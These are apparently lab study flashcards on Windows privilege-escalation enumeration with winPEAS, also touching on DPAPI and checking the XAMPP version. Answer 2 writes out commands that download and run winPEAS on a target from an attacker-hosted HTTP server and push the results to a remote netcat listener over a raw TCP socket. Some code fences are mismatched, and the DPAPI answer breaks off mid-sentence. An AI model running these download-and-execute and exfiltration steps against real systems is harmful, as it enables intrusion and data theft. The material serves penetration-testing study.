Win Priv. esc. Automated Enumeration

Question 1

Most common tool for info gathering for priv. esc on windows ?

Answer 1

winPEAS

Question 2

How setup WinPeas on remote machine ?

Answer 2

Get access
```bash
nc 192.168.169.220 4444
powershell
~~~

Get WinPeas
```bash
cp /usr/share/peass/winpeas/winPEASx64.exe .
python3 -m http.server 80
~~~

Download WinPeas on windows target
```powershell
iwr -uri http://192.168.45.161/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe > winPeas_Rslts.txt
~~~

Send results via powershell
```powershell
$client = New-Object System.Net.Sockets.TcpClient(“192.168.45.161”, 4000)
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter $stream
$fileContent = Get-Content “winPeas_Rslts.txt” -Raw
$writer.Write($fileContent)
$writer.Flush()
$writer.Close()
$client.Close()
~~~

Retrieve file
```bash
nc -lvnp 4000 > winPeas_Rslts.txt
~~~

Question 3

Is automated enum tool enouthg ?

Answer 3

Nope, it can miss some sensible file and be imprecise

Question 4

What is DPAPI Credential Files ?

Answer 4

The Data Protection API (DPAPI) is primarily utilized within the Windows operating system for the symmetric encryption of asymmetric private keys,

Question 5

How get version of installed xampp with PS ?

Answer 5

Get version of xampp
~~~
Get-ItemProperty -Path “HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall*” |
Where-Object { $_.DisplayName -like “xampp” } |
Select-Object DisplayName, DisplayVersion
~~~